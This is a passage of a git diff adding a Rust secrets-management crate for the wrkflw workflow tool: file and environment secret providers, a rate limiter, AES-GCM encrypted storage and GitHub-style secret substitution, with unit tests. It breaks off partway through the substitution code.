        let test_secret_name = format!("API_KEY_{}", std::process::id());
        let full_env_name = format!("WRKFLW_SECRET_{}", test_secret_name);
        std::env::set_var(&full_env_name, "secret_api_key");

        let result = provider.get_secret(&test_secret_name).await;
        assert!(result.is_ok());

        let secret = result.unwrap();
        assert_eq!(secret.value(), "secret_api_key");

        // Clean up
        std::env::remove_var(&full_env_name);
    }

    #[tokio::test]
    async fn test_environment_provider_not_found() {
        let provider = EnvironmentProvider::default();

        let result = provider.get_secret("NONEXISTENT_SECRET").await;
        assert!(result.is_err());

        match result.unwrap_err() {
            SecretError::NotFound { name } => {
                assert_eq!(name, "NONEXISTENT_SECRET");
            }
            _ => panic!("Expected NotFound error"),
        }
    }
}
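For illustration, a minimal sketch of how the prefix interacts with lookup and listing; the import path is an assumption about the crate's re-exports:

use wrkflw_secrets::{providers::env::EnvironmentProvider, SecretProvider}; // path assumed

#[tokio::main]
async fn main() {
    // With a prefix configured, the provider reads WRKFLW_SECRET_API_KEY...
    std::env::set_var("WRKFLW_SECRET_API_KEY", "s3cr3t");
    let provider = EnvironmentProvider::new(Some("WRKFLW_SECRET_".to_string()));

    // ...while callers address the secret by its short name.
    let secret = provider.get_secret("API_KEY").await.unwrap();
    assert_eq!(secret.value(), "s3cr3t");

    // Listing strips the prefix again; without a prefix it errors instead.
    let names = provider.list_secrets().await.unwrap();
    assert!(names.contains(&"API_KEY".to_string()));
}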
288
crates/secrets/src/providers/file.rs
Normal file
@@ -0,0 +1,288 @@
use crate::{
    validation::validate_secret_value, SecretError, SecretProvider, SecretResult, SecretValue,
};
use async_trait::async_trait;
use serde_json::Value;
use std::collections::HashMap;
use std::path::Path;

/// File-based secret provider
pub struct FileProvider {
    path: String,
}

impl FileProvider {
    /// Create a new file provider
    pub fn new(path: impl Into<String>) -> Self {
        Self { path: path.into() }
    }

    /// Expand tilde in path
    fn expand_path(&self) -> String {
        if self.path.starts_with("~/") {
            if let Some(home) = dirs::home_dir() {
                return home.join(&self.path[2..]).to_string_lossy().to_string();
            }
        }
        self.path.clone()
    }

    /// Load secrets from JSON file
    async fn load_json_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
        let content = tokio::fs::read_to_string(file_path).await?;
        let json: Value = serde_json::from_str(&content)?;

        let mut secrets = HashMap::new();
        if let Value::Object(obj) = json {
            for (key, value) in obj {
                if let Value::String(secret_value) = value {
                    secrets.insert(key, secret_value);
                } else {
                    secrets.insert(key, value.to_string());
                }
            }
        }

        Ok(secrets)
    }

    /// Load secrets from YAML file
    async fn load_yaml_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
        let content = tokio::fs::read_to_string(file_path).await?;
        let yaml: serde_yaml::Value = serde_yaml::from_str(&content)?;

        let mut secrets = HashMap::new();
        if let serde_yaml::Value::Mapping(map) = yaml {
            for (key, value) in map {
                if let (serde_yaml::Value::String(k), v) = (key, value) {
                    let secret_value = match v {
                        serde_yaml::Value::String(s) => s,
                        _ => serde_yaml::to_string(&v)?.trim().to_string(),
                    };
                    secrets.insert(k, secret_value);
                }
            }
        }

        Ok(secrets)
    }

    /// Load secrets from environment-style file
    async fn load_env_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
        let content = tokio::fs::read_to_string(file_path).await?;
        let mut secrets = HashMap::new();

        for line in content.lines() {
            let line = line.trim();
            if line.is_empty() || line.starts_with('#') {
                continue;
            }

            if let Some((key, value)) = line.split_once('=') {
                let key = key.trim().to_string();
                let value = value.trim();

                // Handle quoted values
                let value = if (value.starts_with('"') && value.ends_with('"'))
                    || (value.starts_with('\'') && value.ends_with('\''))
                {
                    &value[1..value.len() - 1]
                } else {
                    value
                };

                secrets.insert(key, value.to_string());
            }
        }

        Ok(secrets)
    }

    /// Load all secrets from the configured path
    async fn load_secrets(&self) -> SecretResult<HashMap<String, String>> {
        let expanded_path = self.expand_path();
        let path = Path::new(&expanded_path);

        if !path.exists() {
            return Ok(HashMap::new());
        }

        if path.is_file() {
            // Single file - determine format by extension
            if let Some(extension) = path.extension().and_then(|ext| ext.to_str()) {
                match extension.to_lowercase().as_str() {
                    "json" => self.load_json_secrets(path).await,
                    "yml" | "yaml" => self.load_yaml_secrets(path).await,
                    "env" => self.load_env_secrets(path).await,
                    _ => {
                        // Default to environment format for unknown extensions
                        self.load_env_secrets(path).await
                    }
                }
            } else {
                // No extension, try environment format
                self.load_env_secrets(path).await
            }
        } else {
            // Directory - load from multiple files
            let mut all_secrets = HashMap::new();
            let mut entries = tokio::fs::read_dir(path).await?;

            while let Some(entry) = entries.next_entry().await? {
                let entry_path = entry.path();
                if entry_path.is_file() {
                    if let Some(extension) = entry_path.extension().and_then(|ext| ext.to_str()) {
                        let secrets = match extension.to_lowercase().as_str() {
                            "json" => self.load_json_secrets(&entry_path).await?,
                            "yml" | "yaml" => self.load_yaml_secrets(&entry_path).await?,
                            "env" => self.load_env_secrets(&entry_path).await?,
                            _ => continue, // Skip unknown file types
                        };
                        all_secrets.extend(secrets);
                    }
                }
            }

            Ok(all_secrets)
        }
    }
}

#[async_trait]
impl SecretProvider for FileProvider {
    async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
        let secrets = self.load_secrets().await?;

        if let Some(value) = secrets.get(name) {
            // Validate the secret value
            validate_secret_value(value)?;

            let mut metadata = HashMap::new();
            metadata.insert("source".to_string(), "file".to_string());
            metadata.insert("file_path".to_string(), self.expand_path());

            Ok(SecretValue::with_metadata(value.clone(), metadata))
        } else {
            Err(SecretError::not_found(name))
        }
    }

    async fn list_secrets(&self) -> SecretResult<Vec<String>> {
        let secrets = self.load_secrets().await?;
        Ok(secrets.keys().cloned().collect())
    }

    fn name(&self) -> &str {
        "file"
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use tempfile::TempDir;

    async fn create_test_json_file(dir: &TempDir, content: &str) -> String {
        let file_path = dir.path().join("secrets.json");
        tokio::fs::write(&file_path, content).await.unwrap();
        file_path.to_string_lossy().to_string()
    }

    async fn create_test_env_file(dir: &TempDir, content: &str) -> String {
        let file_path = dir.path().join("secrets.env");
        tokio::fs::write(&file_path, content).await.unwrap();
        file_path.to_string_lossy().to_string()
    }

    #[tokio::test]
    async fn test_file_provider_json() {
        let temp_dir = TempDir::new().unwrap();
        let file_path = create_test_json_file(
            &temp_dir,
            r#"
            {
                "API_KEY": "secret_api_key",
                "DB_PASSWORD": "secret_password"
            }
            "#,
        )
        .await;

        let provider = FileProvider::new(file_path);

        let result = provider.get_secret("API_KEY").await;
        assert!(result.is_ok());

        let secret = result.unwrap();
        assert_eq!(secret.value(), "secret_api_key");
        assert_eq!(secret.metadata.get("source"), Some(&"file".to_string()));
    }

    #[tokio::test]
    async fn test_file_provider_env_format() {
        let temp_dir = TempDir::new().unwrap();
        let file_path = create_test_env_file(
            &temp_dir,
            r#"
            # This is a comment
            API_KEY=secret_api_key
            DB_PASSWORD="quoted password"
            GITHUB_TOKEN='single quoted token'
            "#,
        )
        .await;

        let provider = FileProvider::new(file_path);

        let api_key = provider.get_secret("API_KEY").await.unwrap();
        assert_eq!(api_key.value(), "secret_api_key");

        let password = provider.get_secret("DB_PASSWORD").await.unwrap();
        assert_eq!(password.value(), "quoted password");

        let token = provider.get_secret("GITHUB_TOKEN").await.unwrap();
        assert_eq!(token.value(), "single quoted token");
    }

    #[tokio::test]
    async fn test_file_provider_not_found() {
        let temp_dir = TempDir::new().unwrap();
        let file_path = create_test_json_file(&temp_dir, "{}").await;

        let provider = FileProvider::new(file_path);

        let result = provider.get_secret("NONEXISTENT").await;
        assert!(result.is_err());

        match result.unwrap_err() {
            SecretError::NotFound { name } => {
                assert_eq!(name, "NONEXISTENT");
            }
            _ => panic!("Expected NotFound error"),
        }
    }

    #[tokio::test]
    async fn test_file_provider_list_secrets() {
        let temp_dir = TempDir::new().unwrap();
        let file_path = create_test_json_file(
            &temp_dir,
            r#"
            {
                "SECRET_1": "value1",
                "SECRET_2": "value2",
                "SECRET_3": "value3"
            }
            "#,
        )
        .await;

        let provider = FileProvider::new(file_path);

        let secrets = provider.list_secrets().await.unwrap();
        assert_eq!(secrets.len(), 3);
        assert!(secrets.contains(&"SECRET_1".to_string()));
        assert!(secrets.contains(&"SECRET_2".to_string()));
        assert!(secrets.contains(&"SECRET_3".to_string()));
    }
}
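A caller-side sketch of the extension dispatch above; the file uses the environment format handled by load_env_secrets (comments skipped, surrounding quotes stripped), and the path is illustrative:

// ~/secrets.env (illustrative contents):
//   # comment lines and blanks are skipped
//   API_KEY=plain_value
//   DB_PASSWORD="has spaces"

// Inside an async fn returning SecretResult:
let provider = FileProvider::new("~/secrets.env"); // "~/" expands via dirs::home_dir()
let password = provider.get_secret("DB_PASSWORD").await?;
assert_eq!(password.value(), "has spaces");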
91
crates/secrets/src/providers/mod.rs
Normal file
@@ -0,0 +1,91 @@
use crate::{SecretError, SecretResult};
use async_trait::async_trait;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;

pub mod env;
pub mod file;

// Cloud provider modules are planned for future implementation
// #[cfg(feature = "vault-provider")]
// pub mod vault;

// #[cfg(feature = "aws-provider")]
// pub mod aws;

// #[cfg(feature = "azure-provider")]
// pub mod azure;

// #[cfg(feature = "gcp-provider")]
// pub mod gcp;

/// A secret value with metadata
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SecretValue {
    /// The actual secret value
    value: String,
    /// Optional metadata about the secret
    pub metadata: HashMap<String, String>,
    /// When this secret was retrieved (for caching)
    pub retrieved_at: chrono::DateTime<chrono::Utc>,
}

impl SecretValue {
    /// Create a new secret value
    pub fn new(value: impl Into<String>) -> Self {
        Self {
            value: value.into(),
            metadata: HashMap::new(),
            retrieved_at: chrono::Utc::now(),
        }
    }

    /// Create a new secret value with metadata
    pub fn with_metadata(value: impl Into<String>, metadata: HashMap<String, String>) -> Self {
        Self {
            value: value.into(),
            metadata,
            retrieved_at: chrono::Utc::now(),
        }
    }

    /// Get the secret value
    pub fn value(&self) -> &str {
        &self.value
    }

    /// Check if this secret has expired based on TTL
    pub fn is_expired(&self, ttl_seconds: u64) -> bool {
        let now = chrono::Utc::now();
        let elapsed = now.signed_duration_since(self.retrieved_at);
        elapsed.num_seconds() > ttl_seconds as i64
    }
}

/// Trait for secret providers
#[async_trait]
pub trait SecretProvider: Send + Sync {
    /// Get a secret by name
    async fn get_secret(&self, name: &str) -> SecretResult<SecretValue>;

    /// List available secrets (optional, for providers that support it)
    async fn list_secrets(&self) -> SecretResult<Vec<String>> {
        Err(SecretError::internal(
            "list_secrets not supported by this provider",
        ))
    }

    /// Check if the provider is healthy/accessible
    async fn health_check(&self) -> SecretResult<()> {
        // Default implementation tries to get a non-existent secret.
        // If it returns NotFound, the provider is healthy.
        match self.get_secret("__health_check__").await {
            Err(SecretError::NotFound { .. }) => Ok(()),
            Err(e) => Err(e),
            Ok(_) => Ok(()), // Surprisingly, the health check secret exists
        }
    }

    /// Get the provider name
    fn name(&self) -> &str;
}
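Because list_secrets and health_check have default bodies, a conforming provider only has to supply get_secret and name. A minimal in-memory sketch (StaticProvider is hypothetical, not part of this diff):

use async_trait::async_trait;
use std::collections::HashMap;

/// Hypothetical provider backed by a fixed map, e.g. for tests.
struct StaticProvider {
    values: HashMap<String, String>,
}

#[async_trait]
impl SecretProvider for StaticProvider {
    async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
        self.values
            .get(name)
            .map(|v| SecretValue::new(v.clone()))
            .ok_or_else(|| SecretError::not_found(name))
    }

    fn name(&self) -> &str {
        "static"
    }
    // list_secrets and health_check fall back to the trait defaults above.
}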
242
crates/secrets/src/rate_limit.rs
Normal file
@@ -0,0 +1,242 @@
// Copyright 2024 wrkflw contributors
// SPDX-License-Identifier: MIT

//! Rate limiting for secret access operations

use crate::{SecretError, SecretResult};
use std::collections::HashMap;
use std::sync::Arc;
use std::time::{Duration, Instant};
use tokio::sync::RwLock;

/// Rate limiter configuration
#[derive(Debug, Clone)]
pub struct RateLimitConfig {
    /// Maximum requests per time window
    pub max_requests: u32,
    /// Time window duration
    pub window_duration: Duration,
    /// Whether to enable rate limiting
    pub enabled: bool,
}

impl Default for RateLimitConfig {
    fn default() -> Self {
        Self {
            max_requests: 100,
            window_duration: Duration::from_secs(60), // 1 minute
            enabled: true,
        }
    }
}

/// Track requests for a specific key
#[derive(Debug)]
struct RequestTracker {
    requests: Vec<Instant>,
    first_request: Instant,
}

impl RequestTracker {
    fn new() -> Self {
        let now = Instant::now();
        Self {
            requests: Vec::new(),
            first_request: now,
        }
    }

    fn add_request(&mut self, now: Instant) {
        if self.requests.is_empty() {
            self.first_request = now;
        }
        self.requests.push(now);
    }

    fn cleanup_old_requests(&mut self, window_duration: Duration, now: Instant) {
        let cutoff = now - window_duration;
        self.requests.retain(|&req_time| req_time > cutoff);

        if let Some(&first) = self.requests.first() {
            self.first_request = first;
        }
    }

    fn request_count(&self) -> usize {
        self.requests.len()
    }
}

/// Rate limiter for secret access operations
pub struct RateLimiter {
    config: RateLimitConfig,
    trackers: Arc<RwLock<HashMap<String, RequestTracker>>>,
}

impl RateLimiter {
    /// Create a new rate limiter with the given configuration
    pub fn new(config: RateLimitConfig) -> Self {
        Self {
            config,
            trackers: Arc::new(RwLock::new(HashMap::new())),
        }
    }

    /// Check if a request should be allowed for the given key
    pub async fn check_rate_limit(&self, key: &str) -> SecretResult<()> {
        if !self.config.enabled {
            return Ok(());
        }

        let now = Instant::now();
        let mut trackers = self.trackers.write().await;

        // Clean up old requests for existing tracker
        if let Some(tracker) = trackers.get_mut(key) {
            tracker.cleanup_old_requests(self.config.window_duration, now);

            // Check if we're over the limit
            if tracker.request_count() >= self.config.max_requests as usize {
                let time_until_reset = self.config.window_duration - (now - tracker.first_request);
                return Err(SecretError::RateLimitExceeded(format!(
                    "Rate limit exceeded. Try again in {} seconds",
                    time_until_reset.as_secs()
                )));
            }

            // Add the current request
            tracker.add_request(now);
        } else {
            // Create new tracker and add first request
            let mut tracker = RequestTracker::new();
            tracker.add_request(now);
            trackers.insert(key.to_string(), tracker);
        }

        Ok(())
    }

    /// Reset rate limit for a specific key
    pub async fn reset_rate_limit(&self, key: &str) {
        let mut trackers = self.trackers.write().await;
        trackers.remove(key);
    }

    /// Clear all rate limit data
    pub async fn clear_all(&self) {
        let mut trackers = self.trackers.write().await;
        trackers.clear();
    }

    /// Get current request count for a key
    pub async fn get_request_count(&self, key: &str) -> usize {
        let trackers = self.trackers.read().await;
        trackers.get(key).map(|t| t.request_count()).unwrap_or(0)
    }

    /// Get rate limit configuration
    pub fn config(&self) -> &RateLimitConfig {
        &self.config
    }
}

impl Default for RateLimiter {
    fn default() -> Self {
        Self::new(RateLimitConfig::default())
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use tokio::time::Duration;

    #[tokio::test]
    async fn test_rate_limit_basic() {
        let config = RateLimitConfig {
            max_requests: 3,
            window_duration: Duration::from_secs(1),
            enabled: true,
        };
        let limiter = RateLimiter::new(config);

        // First 3 requests should succeed
        assert!(limiter.check_rate_limit("test_key").await.is_ok());
        assert!(limiter.check_rate_limit("test_key").await.is_ok());
        assert!(limiter.check_rate_limit("test_key").await.is_ok());

        // 4th request should fail
        assert!(limiter.check_rate_limit("test_key").await.is_err());
    }

    #[tokio::test]
    async fn test_rate_limit_different_keys() {
        let config = RateLimitConfig {
            max_requests: 2,
            window_duration: Duration::from_secs(1),
            enabled: true,
        };
        let limiter = RateLimiter::new(config);

        // Different keys should have separate limits
        assert!(limiter.check_rate_limit("key1").await.is_ok());
        assert!(limiter.check_rate_limit("key1").await.is_ok());
        assert!(limiter.check_rate_limit("key2").await.is_ok());
        assert!(limiter.check_rate_limit("key2").await.is_ok());

        // Both keys should now be at their limit
        assert!(limiter.check_rate_limit("key1").await.is_err());
        assert!(limiter.check_rate_limit("key2").await.is_err());
    }

    #[tokio::test]
    async fn test_rate_limit_reset() {
        let config = RateLimitConfig {
            max_requests: 1,
            window_duration: Duration::from_secs(60), // Long window
            enabled: true,
        };
        let limiter = RateLimiter::new(config);

        // Use up the limit
        assert!(limiter.check_rate_limit("test_key").await.is_ok());
        assert!(limiter.check_rate_limit("test_key").await.is_err());

        // Reset and try again
        limiter.reset_rate_limit("test_key").await;
        assert!(limiter.check_rate_limit("test_key").await.is_ok());
    }

    #[tokio::test]
    async fn test_rate_limit_disabled() {
        let config = RateLimitConfig {
            max_requests: 1,
            window_duration: Duration::from_secs(1),
            enabled: false,
        };
        let limiter = RateLimiter::new(config);

        // All requests should succeed when disabled
        for _ in 0..10 {
            assert!(limiter.check_rate_limit("test_key").await.is_ok());
        }
    }

    #[tokio::test]
    async fn test_get_request_count() {
        let config = RateLimitConfig {
            max_requests: 5,
            window_duration: Duration::from_secs(1),
            enabled: true,
        };
        let limiter = RateLimiter::new(config);

        assert_eq!(limiter.get_request_count("test_key").await, 0);

        limiter.check_rate_limit("test_key").await.unwrap();
        assert_eq!(limiter.get_request_count("test_key").await, 1);

        limiter.check_rate_limit("test_key").await.unwrap();
        assert_eq!(limiter.get_request_count("test_key").await, 2);
    }
}
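This is a sliding-window limiter: each key keeps the timestamps of its requests inside the window, stale entries are pruned on every check, and the remaining count is compared against the cap, so per-key memory stays bounded by max_requests. A caller-side sketch (the key naming scheme is an assumption):

let limiter = RateLimiter::new(RateLimitConfig {
    max_requests: 5,
    window_duration: Duration::from_secs(60),
    enabled: true,
});

// Keys are caller-defined; one option is one key per provider.
if limiter.check_rate_limit("provider:env").await.is_ok() {
    // proceed with the secret fetch
}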
351
crates/secrets/src/storage.rs
Normal file
@@ -0,0 +1,351 @@
use crate::{SecretError, SecretResult};
use aes_gcm::{
    aead::{Aead, KeyInit, OsRng},
    Aes256Gcm, Key, Nonce,
};
use base64::{engine::general_purpose, Engine as _};
use serde::{Deserialize, Serialize};
use std::collections::HashMap;

/// Encrypted secret storage for sensitive data at rest
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct EncryptedSecretStore {
    /// Encrypted secrets map (base64 encoded)
    secrets: HashMap<String, String>,
    /// Salt for key derivation (base64 encoded)
    salt: String,
    /// Nonce for encryption (base64 encoded)
    nonce: String,
}

impl EncryptedSecretStore {
    /// Create a new encrypted secret store with a random key
    pub fn new() -> SecretResult<(Self, [u8; 32])> {
        let key = Aes256Gcm::generate_key(&mut OsRng);
        let salt = Self::generate_salt();
        let nonce = Self::generate_nonce();

        let store = Self {
            secrets: HashMap::new(),
            salt: general_purpose::STANDARD.encode(salt),
            nonce: general_purpose::STANDARD.encode(nonce),
        };

        Ok((store, key.into()))
    }

    /// Create an encrypted secret store from existing data
    pub fn from_data(secrets: HashMap<String, String>, salt: String, nonce: String) -> Self {
        Self {
            secrets,
            salt,
            nonce,
        }
    }

    /// Add an encrypted secret
    pub fn add_secret(&mut self, key: &[u8; 32], name: &str, value: &str) -> SecretResult<()> {
        let encrypted = self.encrypt_value(key, value)?;
        self.secrets.insert(name.to_string(), encrypted);
        Ok(())
    }

    /// Get and decrypt a secret
    pub fn get_secret(&self, key: &[u8; 32], name: &str) -> SecretResult<String> {
        let encrypted = self
            .secrets
            .get(name)
            .ok_or_else(|| SecretError::not_found(name))?;

        self.decrypt_value(key, encrypted)
    }

    /// Remove a secret
    pub fn remove_secret(&mut self, name: &str) -> bool {
        self.secrets.remove(name).is_some()
    }

    /// List all secret names
    pub fn list_secrets(&self) -> Vec<String> {
        self.secrets.keys().cloned().collect()
    }

    /// Check if a secret exists
    pub fn has_secret(&self, name: &str) -> bool {
        self.secrets.contains_key(name)
    }

    /// Get the number of stored secrets
    pub fn secret_count(&self) -> usize {
        self.secrets.len()
    }

    /// Clear all secrets
    pub fn clear(&mut self) {
        self.secrets.clear();
    }

    /// Encrypt a value
    fn encrypt_value(&self, key: &[u8; 32], value: &str) -> SecretResult<String> {
        let cipher = Aes256Gcm::new(Key::<Aes256Gcm>::from_slice(key));
        let nonce_bytes = general_purpose::STANDARD
            .decode(&self.nonce)
            .map_err(|e| SecretError::EncryptionError(format!("Invalid nonce: {}", e)))?;

        if nonce_bytes.len() != 12 {
            return Err(SecretError::EncryptionError(
                "Invalid nonce length".to_string(),
            ));
        }

        let nonce = Nonce::from_slice(&nonce_bytes);
        let ciphertext = cipher
            .encrypt(nonce, value.as_bytes())
            .map_err(|e| SecretError::EncryptionError(format!("Encryption failed: {}", e)))?;

        Ok(general_purpose::STANDARD.encode(&ciphertext))
    }

    /// Decrypt a value
    fn decrypt_value(&self, key: &[u8; 32], encrypted: &str) -> SecretResult<String> {
        let cipher = Aes256Gcm::new(Key::<Aes256Gcm>::from_slice(key));
        let nonce_bytes = general_purpose::STANDARD
            .decode(&self.nonce)
            .map_err(|e| SecretError::EncryptionError(format!("Invalid nonce: {}", e)))?;

        if nonce_bytes.len() != 12 {
            return Err(SecretError::EncryptionError(
                "Invalid nonce length".to_string(),
            ));
        }

        let nonce = Nonce::from_slice(&nonce_bytes);
        let ciphertext = general_purpose::STANDARD
            .decode(encrypted)
            .map_err(|e| SecretError::EncryptionError(format!("Invalid ciphertext: {}", e)))?;

        let plaintext = cipher
            .decrypt(nonce, ciphertext.as_ref())
            .map_err(|e| SecretError::EncryptionError(format!("Decryption failed: {}", e)))?;

        String::from_utf8(plaintext)
            .map_err(|e| SecretError::EncryptionError(format!("Invalid UTF-8: {}", e)))
    }

    /// Generate a random salt
    fn generate_salt() -> [u8; 32] {
        let mut salt = [0u8; 32];
        rand::RngCore::fill_bytes(&mut rand::thread_rng(), &mut salt);
        salt
    }

    /// Generate a random nonce
    fn generate_nonce() -> [u8; 12] {
        let mut nonce = [0u8; 12];
        rand::RngCore::fill_bytes(&mut rand::thread_rng(), &mut nonce);
        nonce
    }

    /// Serialize to JSON
    pub fn to_json(&self) -> SecretResult<String> {
        serde_json::to_string_pretty(self)
            .map_err(|e| SecretError::internal(format!("Serialization failed: {}", e)))
    }

    /// Deserialize from JSON
    pub fn from_json(json: &str) -> SecretResult<Self> {
        serde_json::from_str(json)
            .map_err(|e| SecretError::internal(format!("Deserialization failed: {}", e)))
    }

    /// Save to file
    pub async fn save_to_file(&self, path: &str) -> SecretResult<()> {
        let json = self.to_json()?;
        tokio::fs::write(path, json)
            .await
            .map_err(SecretError::IoError)
    }

    /// Load from file
    pub async fn load_from_file(path: &str) -> SecretResult<Self> {
        let json = tokio::fs::read_to_string(path)
            .await
            .map_err(SecretError::IoError)?;
        Self::from_json(&json)
    }
}

impl Default for EncryptedSecretStore {
    fn default() -> Self {
        let (store, _) = Self::new().expect("Failed to create default encrypted store");
        store
    }
}

/// Key derivation utilities
pub struct KeyDerivation;

impl KeyDerivation {
    /// Derive a key from a password using PBKDF2
    pub fn derive_key_from_password(password: &str, salt: &[u8], iterations: u32) -> [u8; 32] {
        let mut key = [0u8; 32];
        let _ = pbkdf2::pbkdf2::<hmac::Hmac<sha2::Sha256>>(
            password.as_bytes(),
            salt,
            iterations,
            &mut key,
        );
        key
    }

    /// Generate a secure random key
    pub fn generate_random_key() -> [u8; 32] {
        Aes256Gcm::generate_key(&mut OsRng).into()
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[tokio::test]
    async fn test_encrypted_secret_store_basic() {
        let (mut store, key) = EncryptedSecretStore::new().unwrap();

        // Add a secret
        store
            .add_secret(&key, "test_secret", "secret_value")
            .unwrap();

        // Retrieve the secret
        let value = store.get_secret(&key, "test_secret").unwrap();
        assert_eq!(value, "secret_value");

        // Check metadata
        assert!(store.has_secret("test_secret"));
        assert_eq!(store.secret_count(), 1);

        let secrets = store.list_secrets();
        assert_eq!(secrets.len(), 1);
        assert!(secrets.contains(&"test_secret".to_string()));
    }

    #[tokio::test]
    async fn test_encrypted_secret_store_multiple_secrets() {
        let (mut store, key) = EncryptedSecretStore::new().unwrap();

        // Add multiple secrets
        store.add_secret(&key, "secret1", "value1").unwrap();
        store.add_secret(&key, "secret2", "value2").unwrap();
        store.add_secret(&key, "secret3", "value3").unwrap();

        // Retrieve all secrets
        assert_eq!(store.get_secret(&key, "secret1").unwrap(), "value1");
        assert_eq!(store.get_secret(&key, "secret2").unwrap(), "value2");
        assert_eq!(store.get_secret(&key, "secret3").unwrap(), "value3");

        assert_eq!(store.secret_count(), 3);
    }

    #[tokio::test]
    async fn test_encrypted_secret_store_wrong_key() {
        let (mut store, key1) = EncryptedSecretStore::new().unwrap();
        let (_, key2) = EncryptedSecretStore::new().unwrap();

        // Add secret with key1
        store
            .add_secret(&key1, "test_secret", "secret_value")
            .unwrap();

        // Try to retrieve with wrong key
        let result = store.get_secret(&key2, "test_secret");
        assert!(result.is_err());
    }

    #[tokio::test]
    async fn test_encrypted_secret_store_not_found() {
        let (store, key) = EncryptedSecretStore::new().unwrap();

        let result = store.get_secret(&key, "nonexistent");
        assert!(result.is_err());

        match result.unwrap_err() {
            SecretError::NotFound { name } => {
                assert_eq!(name, "nonexistent");
            }
            _ => panic!("Expected NotFound error"),
        }
    }

    #[tokio::test]
    async fn test_encrypted_secret_store_remove() {
        let (mut store, key) = EncryptedSecretStore::new().unwrap();

        store
            .add_secret(&key, "test_secret", "secret_value")
            .unwrap();
        assert!(store.has_secret("test_secret"));

        let removed = store.remove_secret("test_secret");
        assert!(removed);
        assert!(!store.has_secret("test_secret"));

        let removed_again = store.remove_secret("test_secret");
        assert!(!removed_again);
    }

    #[tokio::test]
    async fn test_encrypted_secret_store_serialization() {
        let (mut store, key) = EncryptedSecretStore::new().unwrap();

        store.add_secret(&key, "secret1", "value1").unwrap();
        store.add_secret(&key, "secret2", "value2").unwrap();

        // Serialize to JSON
        let json = store.to_json().unwrap();

        // Deserialize from JSON
        let restored_store = EncryptedSecretStore::from_json(&json).unwrap();

        // Verify secrets are still accessible
        assert_eq!(
            restored_store.get_secret(&key, "secret1").unwrap(),
            "value1"
        );
        assert_eq!(
            restored_store.get_secret(&key, "secret2").unwrap(),
            "value2"
        );
    }

    #[test]
    fn test_key_derivation() {
        let password = "test_password";
        let salt = b"test_salt_bytes_32_chars_long!!";
        let iterations = 10000;

        let key1 = KeyDerivation::derive_key_from_password(password, salt, iterations);
        let key2 = KeyDerivation::derive_key_from_password(password, salt, iterations);

        // Same password and salt should produce same key
        assert_eq!(key1, key2);

        // Different salt should produce different key
        let different_salt = b"different_salt_bytes_32_chars!";
        let key3 = KeyDerivation::derive_key_from_password(password, different_salt, iterations);
        assert_ne!(key1, key3);
    }

    #[test]
    fn test_random_key_generation() {
        let key1 = KeyDerivation::generate_random_key();
        let key2 = KeyDerivation::generate_random_key();

        // Random keys should be different
        assert_ne!(key1, key2);

        // Keys should be 32 bytes
        assert_eq!(key1.len(), 32);
        assert_eq!(key2.len(), 32);
    }
}
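A round-trip sketch combining KeyDerivation with the store; the password and iteration count are illustrative. Note that the store keeps a single nonce for every value encrypted under a key, so AES-GCM's usual one-nonce-per-message rule is worth keeping in mind when extending this code.

// Inside a fn returning SecretResult. Derive a key, then encrypt,
// persist, reload, and decrypt.
let salt = KeyDerivation::generate_random_key(); // reused here as 32 random salt bytes
let key = KeyDerivation::derive_key_from_password("hunter2", &salt, 100_000);

let (mut store, _ephemeral_key) = EncryptedSecretStore::new()?;
store.add_secret(&key, "API_KEY", "tk_live_123")?;
assert_eq!(store.get_secret(&key, "API_KEY")?, "tk_live_123");

// The same derived key decrypts a store restored from JSON.
let json = store.to_json()?;
let restored = EncryptedSecretStore::from_json(&json)?;
assert_eq!(restored.get_secret(&key, "API_KEY")?, "tk_live_123");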
252
crates/secrets/src/substitution.rs
Normal file
@@ -0,0 +1,252 @@
use crate::{SecretManager, SecretResult};
use regex::Regex;
use std::collections::HashMap;

lazy_static::lazy_static! {
    /// Regex to match GitHub-style secret references: ${{ secrets.SECRET_NAME }}
    static ref SECRET_PATTERN: Regex = Regex::new(
        r"\$\{\{\s*secrets\.([a-zA-Z0-9_][a-zA-Z0-9_-]*)\s*\}\}"
    ).unwrap();

    /// Regex to match provider-specific secret references: ${{ secrets.provider:SECRET_NAME }}
    static ref PROVIDER_SECRET_PATTERN: Regex = Regex::new(
        r"\$\{\{\s*secrets\.([a-zA-Z0-9_][a-zA-Z0-9_-]*):([a-zA-Z0-9_][a-zA-Z0-9_-]*)\s*\}\}"
    ).unwrap();
}

/// Secret substitution engine for replacing secret references in text
pub struct SecretSubstitution<'a> {
    manager: &'a SecretManager,
    resolved_secrets: HashMap<String, String>,
}

impl<'a> SecretSubstitution<'a> {
    /// Create a new secret substitution engine
    pub fn new(manager: &'a SecretManager) -> Self {
        Self {
            manager,
            resolved_secrets: HashMap::new(),
        }
    }

    /// Substitute all secret references in the given text
    pub async fn substitute(&mut self, text: &str) -> SecretResult<String> {
        let mut result = text.to_string();

        // First, handle provider-specific secrets: ${{ secrets.provider:SECRET_NAME }}
        result = self.substitute_provider_secrets(&result).await?;

        // Then handle default provider secrets: ${{ secrets.SECRET_NAME }}
        result = self.substitute_default_secrets(&result).await?;

        Ok(result)
    }

    /// Substitute provider-specific secret references
    async fn substitute_provider_secrets(&mut self, text: &str) -> SecretResult<String> {
        let mut result = text.to_string();

        for captures in PROVIDER_SECRET_PATTERN.captures_iter(text) {
            let full_match = captures.get(0).unwrap().as_str();
            let provider = captures.get(1).unwrap().as_str();
            let secret_name = captures.get(2).unwrap().as_str();

            let cache_key = format!("{}:{}", provider, secret_name);

            let secret_value = if let Some(cached) = self.resolved_secrets.get(&cache_key) {
                cached.clone()
            } else {
                let secret = self
                    .manager
                    .get_secret_from_provider(provider, secret_name)
                    .await?;
                let value = secret.value().to_string();
                self.resolved_secrets.insert(cache_key, value.clone());
                value
            };

            result = result.replace(full_match, &secret_value);
        }

        Ok(result)
    }

    /// Substitute default provider secret references
    async fn substitute_default_secrets(&mut self, text: &str) -> SecretResult<String> {
        let mut result = text.to_string();

